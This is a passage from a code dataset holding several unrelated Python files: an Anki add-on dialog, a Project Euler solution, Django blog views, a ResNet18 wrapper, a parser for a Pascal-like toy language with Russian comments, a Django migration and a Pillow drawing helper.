toolbar = QToolBar()\n toolbar.addAction(action_create)\n toolbar.addAction(action_edit)\n toolbar.addAction(action_help)\n\n # BOTTOM TOOLBAR\n action_showGraphicText = QAction(\"Show Graphic Text\", self)\n action_editQuestionText = QAction(\"Edit Question Text\", self)\n action_editQuestionText.triggered.connect(lambda checked: self.switchMenu(1))\n action_editAnswerText = QAction(\"Edit Question Text\", self)\n action_editAnswerText.triggered.connect(lambda checked: self.switchMenu(2))\n action_editAlgorithm = QAction(\"Edit Algorithm\", self)\n action_editAlgorithm.triggered.connect(lambda checked: self.switchMenu(3))\n action_showPreview = QAction(\"Show Preview\", self)\n action_showPreview.triggered.connect(self.showPreview)\n\n toolbar_bottom = QToolBar()\n toolbar_bottom.addAction(action_showGraphicText)\n toolbar_bottom.addAction(action_editQuestionText)\n toolbar_bottom.addAction(action_editAnswerText)\n toolbar_bottom.addAction(action_editAlgorithm)\n toolbar_bottom.addAction(action_showPreview)\n\n self.layout = QVBoxLayout()\n self.layout.addWidget(toolbar)\n self.layout.addWidget(self.text_editor)\n self.layout.addWidget(self.output_text)\n self.layout.addWidget(toolbar_bottom)\n\n self.setLayout(self.layout)\n self.show()\n # action_showPlainText.setFont(\n # FONTS\n\n #\n # Execute\n #\n def showPreview(self):\n self.saved_texts[self.menu_triggered] = self.text_editor.toPlainText()\n\n question = self.saved_texts[1]\n answer = self.saved_texts[2]\n algorithm = self.saved_texts[3]\n self.dyna_math.showPreview(question, answer, algorithm)\n #\n # OUTPUT \"CONSOLE\" HELPER FUNCTIONS\n #\n\n def setOutput(self, text):\n self.output_text.setText(text)\n\n def print(self, text):\n prevText = self.output_text.toPlainText()\n self.output_text.setText(prevText + text + \"\\n\")\n\n def printArr(self, arr):\n for i in arr:\n self.print(str(i))\n\n #\n # GUI FUNCTIONS\n #\n # menu_triggered | 0 = graphic text ; 1 = question text ; 2 = answer text ; 3 = algorithm text\n def switchMenu(self, menu_num):\n # saves current text in the correct location\n currentMenu = self.menu_triggered\n self.saved_texts[currentMenu] = self.text_editor.toPlainText()\n # sets text box to desired cached text\n self.text_editor.setText(self.saved_texts[menu_num])\n self.menu_triggered = menu_num\n\n def makeBold(self):\n action_called = self.sender()\n font = action_called.font()\n font.setBold(True)\n action_called.setFont(font)\n\n # function that's called when closed by dialog manager (found in qt/aqt/__init__.py) (REQUIRED BY ANKI)\n def closeWithCallback(self, *args):\n dialogs.markClosed(\"testD\")\n\n\n# About QDialog | https://doc.qt.io/qtforpython/PySide2/QtWidgets/QDialog.html#more\ndef main_func():\n d = QDialog()\n name = \"testD\"\n dialogs.register_dialog(name, CustomDialog)\n dialogs.open(name, mw)\n\n\n# create a new menu item, \"test\"\naction = QAction(\"test\", mw)\n# set it to call testFunction when it's clicked\naction.triggered.connect(main_func)\n# and add it to the tools menu\nmw.form.menuTools.addAction(action)\n\n\n\n\n\n","sub_path":"src/dynamic_math/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"8883872","text":"# coding: utf-8\n'''\nすべての桁に 1 から n が一度だけ使われている数をn桁の数がパンデジタル (pandigital) であるということにしよう\n例えば5桁の数 15234 は1から5のパンデジタルである.\n7254 は面白い性質を持っている. 39 × 186 = 7254 と書け, 掛けられる数, 掛ける数, 積が1から9のパンデジタルとなる.\n掛けられる数/掛ける数/積が1から9のパンデジタルとなるような積の総和を求めよ.\nHINT: いくつかの積は, 1通り以上の掛けられる数/掛ける数/積の組み合わせを持つが1回だけ数え上げよ.\n'''\nimport itertools\n\n\ndef main():\n # 桁数について\n # 1桁×4桁=4桁,2桁×3桁=4桁の2パターンしか存在しないことは自明\n # パンデジタル数を上から2桁を掛けられる数,3~5桁を掛ける数,下4桁を積として成立するかを考える\n numlist = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n panlist = list(itertools.permutations(numlist))\n for n in range(len(panlist)):\n pl = panlist[n]\n pan = 0\n for i in range(9):\n pan += pl[i]*(10**(8-i))\n panlist[n] = pan\n finlist = []\n for pan in panlist:\n # 1桁×4桁=4桁\n pro = pan % 10000\n b = (pan//10000) % 10000\n a = pan // 100000000\n if a*b == pro:\n print(a, b, pro)\n finlist.append(pro)\n # 2桁×3桁=4桁\n pro = pan % 10000\n b = (pan//10000) % 1000\n a = pan // 10000000\n if a*b == pro:\n print(a, b, pro)\n finlist.append(pro)\n finlist_uniq = list(set(finlist))\n s = 0\n for f in finlist_uniq:\n s += f\n print(s)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Practice/ProjectEuler/Problem32.py","file_name":"Problem32.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483835366","text":"import sys\nsys.stdin = open('input.txt','r')\nN= int(input())\nh= list(map(int,input().split()))+[0]\nstart = 0 #오르막 구간의 시작 인덱스\nstatus = 0 #오르막 구간1, 나머지 0 (오르막길이의 상태를 나타냄)\nmaxV=0\nfor i in range(N): #오른쪽과 비교할 자리i\n if(status==0 and h[i]=h[i+1]): #i에서 오르막이 끝나면\n diff = h[i] - h[start] # 오르막 구간의 높이차\n if(maxV 0 else 0: page_number - 1]\n\n # 如果最左边的页码比第二页页码大\n if left[0] > 2:\n left_has_more = True\n\n if left[0] > 1:\n first = True\n\n else:\n # 用户请求的是中间的页码\n left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0: page_number - 1]\n right = page_range[page_number:page_number + 2]\n\n # 是否需要显示最后一页和最后一页前的省略号\n if right[-1] < total_pages - 1:\n right_has_more = True\n if right[-1] < total_pages:\n last = True\n\n # 左边\n if left[0] > 2:\n left_has_more = True\n if left[0] > 1:\n first = True\n\n # context要更新的分页导航条的数据\n data = {\n 'left': left,\n 'right': right,\n 'left_has_more': left_has_more,\n 'right_has_more': right_has_more,\n 'first': first,\n 'last': last,\n }\n\n return data\n\n\n# 简短写法\n# @staticmethod\n# def pagination_data(paginator, page, is_paginated):\n# if not is_paginated:\n# return {}\n# left = []\n# right = []\n# left_has_more = False\n# right_has_more = False\n# first = False\n# last = False\n#\n# page_number = page.number\n# total_pages = paginator.num_pages\n# page_range = paginator.page_range\n#\n# left = page_range[(page_number - 3) if (page_number - 3) > 0 else 0:\n# (page_number - 1) if (page_number - 1) > 0 else 0]\n# right = page_range[page_number:page_number + 2]\n#\n# if right:\n# if right[-1] < total_pages:\n# last = True\n# if right[-1] < total_pages - 1:\n# right_has_more = True\n# if left:\n# if left[0] > 1:\n# first = True\n# if left[0] > 2:\n# left_has_more = True\n#\n# data = {'left': left,\n# 'right': right,\n# 'left_has_more': left_has_more,\n# 'right_has_more': right_has_more,\n# 'first': first,\n# 'last': last, }\n#\n# return data\n\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'blog/detail.html'\n context_object_name = 'post'\n\n # get_object, get_context_data都是辅助方法,都会在get中调用\n def get(self, request, *args, **kwargs):\n \"\"\"get方法最终会返回一个HTTPResponse\"\"\"\n response = super().get(request, *args, **kwargs)\n\n # 文章阅读量+1。这里的object就是get_object()返回的object, 就是文章post的一个实例\n self.object.increase_page_view()\n\n return response\n\n def get_object(self, queryset=None):\n \"\"\"覆写 get_object 方法的目的是因为需要对post的body值进行markdown渲染\"\"\"\n post = super().get_object(queryset=None)\n md = markdown.Markdown(extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n # 'markdown.extensions.toc', 这个内置的拓展的锚点URL不美观(#_1,当有中文时就会简单的在#后加上_x)\n TocExtension(slugify=slugify)\n ])\n\n post.body = md.convert(post.body)\n post.toc = md.toc\n\n return post\n\n def get_context_data(self, **kwargs):\n \"\"\"传递除context_object_name以外的变量到模板\"\"\"\n context = super().get_context_data(**kwargs)\n form = CommentForm()\n comment_list = self.object.comment_set.all()\n context.update({\n 'form': form,\n 'comment_list': comment_list,\n })\n return context\n\n\nclass ArchivesView(IndexView):\n def get_queryset(self):\n # 在类视图中,从 URL 捕获的命名组参数值保存在实例的 kwargs 属性(是一个字典)里,非命名组参数值保存在实例的 args 属性(是一个元组)里。原理看ContextMixin。\n year = self.kwargs.get('year')\n month = self.kwargs.get('month')\n return super().get_queryset().filter(created_time__year=year, created_time__month=month)\n\n\nclass CategoryView(IndexView):\n def get_queryset(self):\n cate = get_object_or_404(Category, pk=self.kwargs.get('pk'))\n # 因为父类IndexView绑定了model = Post, 所以get_queryset对Post操作\n return super().get_queryset().filter(category=cate)\n\n\nclass TagView(IndexView):\n def get_queryset(self):\n tag = get_object_or_404(Tag, pk=self.kwargs.get('pk'))\n return super().get_queryset().filter(tags=tag)\n\n\n# def search(request):\n# \"\"\"简单的搜索功能\"\"\"\n# q = request.GET.get('q')\n# error_msg = ''\n#\n# if not q:\n# error_msg = '请输入关键词'\n# return render(request, 'blog/index.html', {'error_msg': error_msg})\n#\n# # Q提供了复杂的查询逻辑\n# post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n# return render(request, 'blog/index.html', {'error_msg': error_msg,\n# 'post_list': post_list})\n\nclass SearchView(IndexView):\n def get(self, request, *args, **kwargs):\n \"\"\"get方法最终会返回一个HTTPResponse\"\"\"\n q = request.GET.get('q')\n error_msg = ''\n\n if not q:\n error_msg = '请输入关键词'\n return render(request, 'blog/index.html', {'error_msg': error_msg})\n\n # Q提供了复杂的查询逻辑\n post_list = Post.objects.filter(Q(title__icontains=q) | Q(body__icontains=q))\n return render(request, 'blog/index.html', {'error_msg': error_msg,\n 'post_list': post_list})\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"324472124","text":"# Copyright 2021 MosaicML. All Rights Reserved.\n\nfrom typing import List, Optional\n\nfrom composer.models.base import MosaicClassifier\nfrom composer.models.model_hparams import Initializer\nfrom composer.models.resnets import ImageNet_ResNet\n\n\nclass ResNet18(MosaicClassifier):\n \"\"\"A ResNet-18 model extending :class:`MosaicClassifier`.\n\n See this `paper `_ for details\n on the residual network architecture.\n\n Args:\n num_classes (int): The number of classes for the model.\n initializers (List[Initializer], optional): Initializers\n for the model. ``None`` for no initialization.\n (default: ``None``)\n \"\"\"\n\n def __init__(\n self,\n num_classes: int,\n initializers: Optional[List[Initializer]] = None,\n ) -> None:\n if initializers is None:\n initializers = []\n\n model = ImageNet_ResNet.get_model_from_name(\n \"imagenet_resnet_18\",\n initializers,\n num_classes,\n )\n super().__init__(module=model)\n","sub_path":"composer/models/resnet18/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"129320727","text":"from new_lexer import *\n# Класс узла дерева\n\n# Класс идентификатора\nclass SID:\n def __init__(self, level, vtype, value, size=0, fargs=None):\n self.value = value\n self.vtype = vtype\n self.level = level\n self.size = size\n self.elems = [value for _ in range(size)]\n self.fargs = fargs\n\n\n# Класс узла дерева синтаксиса\nclass Node:\n def __init__(self, kind, value=None, name='', op1=None, op2=None, op3=None, level=0):\n self.kind = kind\n self.value = value\n self.op1 = op1\n self.op2 = op2\n self.op3 = op3\n self.name = name\n self.level = level\n\n# Класс парсера\nclass Parser:\n # Конструктор\n def __init__(self, lexer):\n self.lexer = lexer # лексер\n self.level = 0 # вложенность\n self.levels = 1 # количество уровней всего\n self.MAXLEVELS = 10\n self.MAXARR = 256\n self.MAXSTR = 256\n self.table = [{} for _ in range(self.MAXLEVELS)] # таблица символов\n self.funcount = 0 # сколько функций\n\n\n # Ошибка\n def error(self, msg):\n print('Parser error at %d:%d : %s' % (self.lexer.lin_read + 1, self.lexer.chr_read, msg))\n sys.exit(1)\n\n\n # Терм\n def term(self):\n if self.lexer.sym in (Lexer.ID, Lexer.NUM, Lexer.STR):\n n = Node(self.lexer.sym, self.lexer.value, level=self.level)\n if self.lexer.sym == Lexer.STR: # строка - это что-то особое\n n = Node(self.lexer.sym, self.lexer.value, level=self.level)\n self.table[self.level][self.lexer.value] = SID(self.level, 1, self.lexer.value, len(self.lexer.value))\n\n prev_sym = self.lexer.sym\n\n\n if self.lexer.sym == Lexer.ID:\n n = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level)\n prev_name = self.lexer.ident\n self.lexer.next_tok()\n\n # ПРОВЕРКА НА ИНДЕКСЫ,\n if self.lexer.sym == Lexer.LSCB: # [\n if prev_sym != Lexer.ID:\n self.error('string or array expected')\n t = self.table[self.level].get(prev_name)\n if t == None:\n t = self.table[0].get(prev_name) # глобально\n if t == None:\n self.error('index error')\n elif t.vtype not in (1, 2): # не строка и не массив\n self.error('string or array expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.ID, Lexer.NUM): # должно быть число или переменная\n self.error('index expected')\n if self.lexer.sym == Lexer.NUM:\n n.op1 = Node(self.lexer.sym, self.lexer.value, level=self.level)\n elif self.lexer.sym == Lexer.ID:\n n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RSCB: # ]\n self.error('\"]\" expected')\n self.lexer.next_tok()\n\n # ФУНКЦИЯ И СКОБОЧКИ\n elif self.lexer.sym == Lexer.LPAR:\n t = self.table[0].get(n.name)\n if t == None:\n self.error('no such function: \"%s\"' % n.name)\n if t.fargs == None:\n self.error('function expected')\n self.lexer.next_tok()\n longname = \"\"\n pcounter = 0\n if self.lexer.sym in (Lexer.ID, Lexer.NUM): # есть параметр\n if self.lexer.sym == Lexer.ID:\n pident = self.lexer.ident # ID пепвой переменной\n else:\n pident = self.lexer.value # значение числа\n self.lexer.next_tok()\n longname += \"%s \" % pident\n pcounter = 1\n if self.lexer.sym == Lexer.COMMA: # если запятая\n self.lexer.next_tok() # следом доджна быть еще переменная\n while (True):\n if self.lexer.sym == Lexer.ID:\n pident = self.lexer.ident\n else:\n pident = self.lexer.value\n longname += \"%s \" % pident\n pcounter += 1\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если опяь запятая\n self.lexer.next_tok()\n else:\n break\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n if pcounter != len(t.fargs):\n self.error('wrong number of parameters: expected %s, got %s' % (len(t.fargs), pcounter))\n n.op2 = Node(Lexer.EMPTY, name = longname) # для того чтобы функция знала имена своих параметров\n\n # \\ПРОВЕРКА\n\n return n\n else:\n return self.paren_expr()\n\n # Сумма\n def summa(self):\n n = self.term()\n while self.lexer.sym in (Lexer.PLUS, Lexer.MINUS, Lexer.MUL, Lexer.DIV): # арифметические операции\n kind = self.lexer.sym\n if n.op2 == None or kind in (Lexer.PLUS, Lexer.MINUS): # с низким приоритетом\n self.lexer.next_tok()\n n = Node(kind, op1=n, op2=self.term(), level=self.level)\n else: # с высоким приоритетом\n self.lexer.next_tok()\n n1 = Node(kind, op1=n.op2, op2=self.term(), level=self.level)\n n.op2 = n1\n\n return n\n\n # Проверка на знаки сравнения и вызов арифметики\n def test(self):\n n = self.summa()\n if self.lexer.sym in (Lexer.LESS, Lexer.GRTR, Lexer.EQUAL):\n kind = self.lexer.sym\n\n self.lexer.next_tok()\n n = Node(kind, op1=n, op2=self.summa(), level=self.level)\n\n return n\n\n # Выражение\n def expr(self):\n if self.lexer.sym != Lexer.ID:\n return self.test()\n\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся считать переменную, которой нет\n if self.level > 0: # ищем еще и в глобальных\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n else:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n n = self.test()\n if n.kind == Lexer.ID:\n if self.lexer.sym == Lexer.SET:\n self.lexer.next_tok()\n n = Node(Lexer.SET, op1=n, op2=self.expr(), level=self.level)\n return n\n\n # Скобки\n def paren_expr(self):\n if self.lexer.sym != Lexer.LPAR:\n self.error('\"(\" expected')\n self.lexer.next_tok()\n n = self.expr()\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n return n\n\n # Выражение главное\n def statement(self):\n if self.level != 0: # внутри функций можно и переменные объявлять\n while (True):\n if self.lexer.sym == Lexer.VAR: # объявление переменной\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # должна быть переменная\n self.error('variable expected!')\n\n ident = self.lexer.ident\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # должно быть двоеточие\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR): # тип переменной\n self.error('variable type expected')\n\n self.makevar(ident, self.level)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON: # и вишенка на торте\n self.error('\";\" expected')\n self.lexer.next_tok()\n else:\n break\n\n if self.lexer.sym == Lexer.IF: # обработка IF\n n = Node(Lexer.IF1, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.paren_expr()\n if self.lexer.sym != Lexer.THEN: # THEN\n self.error('\"then\" expected')\n self.lexer.next_tok()\n n.op2 = self.statement()\n if self.lexer.sym == Lexer.ELSE: # ELSE\n n.kind = Lexer.IF2\n self.lexer.next_tok()\n n.op3 = self.statement()\n elif self.lexer.sym == Lexer.WHILE: # обработка WHILE\n n = Node(Lexer.WHILE, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.paren_expr()\n n.op2 = self.statement()\n elif self.lexer.sym == Lexer.DO: # обработка DO\n n = Node(Lexer.DO, level=self.level)\n self.lexer.next_tok()\n n.op1 = self.statement()\n if self.lexer.sym != Lexer.WHILE:\n self.error('\"while\" expected')\n self.lexer.next_tok()\n n.op2 = self.paren_expr()\n if self.lexer.sym != Lexer.SEMICOLON: # точка с запятой\n self.error('\";\" expected')\n elif self.lexer.sym == Lexer.SEMICOLON:\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n elif self.lexer.sym == Lexer.BEGIN: # обработка начала-конца\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n\n while self.lexer.sym != Lexer.END:\n n = Node(Lexer.SEQ, op1=n, op2=self.statement(), level=self.level)\n self.lexer.next_tok()\n\n elif self.lexer.sym == Lexer.READ: # считывание переменной\n n = Node(Lexer.READ, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR: # должны быть скобки\n self.error('\"(\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # если пытаемся считать НЕ переменную\n self.error('variable expected')\n n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level) # создаем узел\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся считать переменную, которой нет\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RPAR: # должны быть скобки\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n\n elif self.lexer.sym == Lexer.WRITE: # вывод на экран\n n = Node(Lexer.WRITE, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR: # должны быть скобки\n self.error('\"(\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.ID, Lexer.STR): # вывести можно: строку, переменную\n self.error('string or variable expected')\n n.op1 = Node(self.lexer.sym, self.lexer.value, name=self.lexer.ident, level=self.level) # создаем узел\n\n if self.lexer.sym == Lexer.ID: # если выводим переменную\n if self.table[self.level].get(self.lexer.ident) == None: # пытаемся вывести переменную, которой нет\n if self.table[0].get(self.lexer.ident) == None:\n errstr = \"unknown variable: '%s'\" % self.lexer.ident\n self.error(errstr)\n\n if self.lexer.sym == Lexer.STR:\n n.op1 = Node(self.lexer.sym, self.lexer.value, level=self.level)\n self.table[self.level][self.lexer.value] = SID(self.level, 1, self.lexer.value, len(self.lexer.value))\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RPAR: # должны быть скобки\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n else:\n n = Node(Lexer.EXPR, op1=self.expr(), level=self.level)\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n self.lexer.next_tok()\n return n\n\n # ОБЪЯВЛЕНИЕ ПЕРЕМЕННЫХ\n def makevar(self, ident, lev, argcount=-1, params=[]):\n # тип переменной это 0 - int, 1 - str, 2 - arr\n vtype = 0\n if self.lexer.sym == Lexer.STR: # если строка\n vtype = 1\n elif self.lexer.sym == Lexer.ARR: # если массив\n vtype = 2\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LSCB: # если массив без размера\n self.error('\"[\" expected') # то он не нужен\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.NUM: # если размер массива не число\n self.error('number expected') # он тоже не нужен\n if self.lexer.value < 1 or self.lexer.value > self.MAXARR: # размеры массива\n self.error('incorrect array size')\n asize = self.lexer.value\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.RSCB: # если массив без размера\n self.error('\"]\" expected') # то он не нужен\n\n if self.table[lev].get(ident) == None:\n if vtype == 0:\n if argcount != -1: # если функция\n self.table[lev][ident] = SID(lev, vtype, value=self.level, size=argcount, fargs=params)\n else:\n self.table[lev][ident] = SID(lev, vtype, value=0)\n elif vtype == 1:\n self.table[lev][ident] = SID(lev, vtype, 0, self.MAXSTR) # создаем строку\n elif vtype == 2:\n self.table[lev][ident] = SID(lev, vtype, 0, asize) # создаем массив\n else:\n errstr = \"variable '%s' already exists\" % ident\n self.error(errstr)\n\n # парсинг области, где есть функции и объявление переменныъ\n def compound_statement(self):\n n = Node(Lexer.EMPTY)\n while self.lexer.sym != Lexer.EOF:\n\n if self.lexer.sym == Lexer.VAR: # объявление переменной\n n = Node(Lexer.EMPTY, level=self.level)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # должна быть переменная\n self.error('variable expected!')\n\n ident = self.lexer.ident\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # должно быть двоеточие\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR): # тип переменной - integer, string, array\n self.error('variable type expected')\n\n self.makevar(ident, self.level)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON: # и вишенка на торте\n self.error('\";\" expected')\n\n # ФУНКЦИИ\n elif self.lexer.sym == Lexer.FUNC:\n self.levels += 1 # Нашел функцию - общее количество уровней увеличилось\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID:\n self.error('function name expected')\n fname = self.lexer.ident\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR:\n self.error('\"(\" expected')\n self.lexer.next_tok()\n pcounter = 0\n pargs = []\n # просто пустые параметры, их нет\n if self.lexer.sym != Lexer.ID:\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n else:\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON:\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR):\n self.error('function type expected')\n # ЗАНЕСЕНИЕ ФУНКЦИИ В ТАБЛИЦУ КАК ПЕРЕМЕННОЙ\n self.level = self.levels - 1\n self.makevar(fname, 0, pcounter, params=pargs)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n else: # если нашел параметр\n # ФУНКЦИИ С ПАРАМЕТРАМИ\n pident = self.lexer.ident # ID пепвой переменной\n self.makevar(pident, self.levels - 1) # создаем новый уровень видимости\n pargs.append(pident)\n # Функция - это statement?\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если запятая\n pcounter = 1\n self.lexer.next_tok() # следом доджна быть еще переменная\n while (True): # ИНИЦИАЛИЩАЦИЯ ПАРАМЕТРОВ ФУНКЦИИ (ДО 4х)\n pident = self.lexer.ident\n pargs.append(pident)\n self.makevar(pident, self.levels - 1) # заводим переменную\n pcounter += 1\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если опяь запятая\n self.lexer.next_tok()\n else:\n break\n if pcounter > 4: # чтобы не иметь дел со стеком\n self.error('Maximum 4 parameters allowed')\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # ТИП ФУНКЦИИ\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR):\n self.error('function type expected')\n # ЗАНЕСЕНИЕ ФУНКЦИИ В ТАБЛИЦУ КАК ПЕРЕМЕННОЙ\n self.level = self.levels - 1\n self.makevar(fname, 0, pcounter, pargs)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n # Тело функции\n self.lexer.next_tok()\n\n n = Node(Lexer.FUNC, op1=n, op2=self.statement(), level=self.level, name=fname) # вызываем функцию\n self.level = 0\n self.funcount += 1\n\n elif self.lexer.sym == Lexer.BEGIN: # обработка начала-конца\n n = Node(Lexer.MAIN, op1=n, op2=self.statement(), level=self.level)\n if self.lexer.sym == Lexer.DOT:\n self.lexer.next_tok()\n return n\n else:\n print(\"Got %s\" % self.lexer.sym)\n n = Node(self.lexer.EMPTY)\n self.error('statement error')\n self.lexer.next_tok()\n return n\n\n # Функция парсинга\n def parse(self):\n self.lexer.next_tok()\n node = Node(Lexer.PROG, op1=self.compound_statement(), level=self.level)\n if (self.lexer.sym != Lexer.EOF):\n self.error(\"Invalid statement syntax\")\n return node\n\n # Функция вывода таблицы\n def print_table(self):\n for i in range(self.levels):\n print(\"LEVEL \", i)\n if self.table[i] == {}:\n print(\"EMPTY\")\n else:\n tt = self.table[i]\n for x in tt:\n t = self.table[i].get(x)\n vt = \"INTEGER\"\n if t.vtype == 1:\n vt = \"STRING\"\n elif t.vtype == 2:\n vt = \"ARRAY\"\n s = ''\n if t.fargs != None:\n s = \"args: \" + str(t.fargs)\n print(\"%16s: level = %s, vtype = %s, value = %s, size = %s, %s\" %\n (x, t.level, vt, t.value, t.size, s))\n\n\n# Вывод дерева\ndef printer(node, n):\n s = \"\"\n if node != None:\n if n > 1:\n s += \"|\"\n s += \" \" * n\n if n > 1:\n s += \"=>\"\n s2 = ''\n if node.name != '':\n s2 = 'name: ' + node.name\n print(\"%s kind: %s value: %s %s\" % (s, node.kind, node.value, s2))\n printer(node.op1, n + 3)\n printer(node.op2, n + 3)\n printer(node.op3, n + 3)\n\n","sub_path":"new_parser.py","file_name":"new_parser.py","file_ext":"py","file_size_in_byte":23280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"596752749","text":"from __future__ import unicode_literals\nfrom django.db import migrations, models\nfrom slugify import UniqueSlugify\n\n\ndef addCustom(apps, schema_editor):\n\n ExistingRecords = apps.get_model('schema', 'cameramodel')\n\n custom_slugify_unique = UniqueSlugify(to_lower=True)\n\n for record in ExistingRecords.objects.all():\n record.slug = custom_slugify_unique(\"{} {} {}\".format(\n record.manufacturer.name, record.model, str(record.disambiguation or '')))\n record.save()\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('schema', '0035_cameramodel_slug'),\n ]\n operations = [\n migrations.RunPython(\n addCustom, reverse_code=migrations.RunPython.noop),\n ]\n","sub_path":"schema/migrations/0036_cameramodel_slug.py","file_name":"0036_cameramodel_slug.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146717519","text":"import os.path as osp\n\nimport matplotlib\nimport numpy as np\nimport PIL.Image\nimport PIL.ImageDraw\nimport PIL.ImageFont\n\n\ndef rectangle(src, aabb1, aabb2, color, fill=None, width=0):\n '''Draw rectangle on numpy array with Pillow.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input image.\n aabb1, aabb2: (2,) array-like\n aabb1 is (y_min, x_min) and aabb2 is (y_max, x_max).\n color: (3,) array-like\n RGB color in uint8.\n fill: (3,) array-like, optional\n RGB color to fill the rectangle. None for no fill. (default: None)\n width: int, optional\n Rectangle line width. (default: 0)\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n color = tuple(color)\n if fill is not None:\n fill = tuple(fill)\n\n src_pil = PIL.Image.fromarray(src)\n draw = PIL.ImageDraw.ImageDraw(src_pil)\n\n y1, x1 = aabb1\n y2, x2 = aabb2\n draw.rectangle(xy=(x1, y1, x2, y2), fill=fill, outline=color, width=width)\n\n dst = np.asarray(src_pil)\n return dst\n\n\ndef _get_font(size):\n fonts_path = osp.join(\n osp.dirname(matplotlib.__file__), 'mpl-data/fonts/ttf'\n )\n font_path = osp.join(fonts_path, 'DejaVuSans.ttf')\n font = PIL.ImageFont.truetype(font=font_path, size=size)\n return font\n\n\ndef text_size(text, size):\n '''Get text size (height and width).\n\n Parameters\n ----------\n text: str\n Text.\n size: int\n Pixel font size.\n\n Returns\n -------\n height: int\n Text height.\n width: int\n Text width.\n '''\n font = _get_font(size)\n width, height = font.getsize(text)\n return height, width\n\n\ndef text(src, yx, text, size, color=(0, 0, 0)):\n '''Draw text on numpy array with Pillow.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input image.\n yx: (2,) array-like\n Left 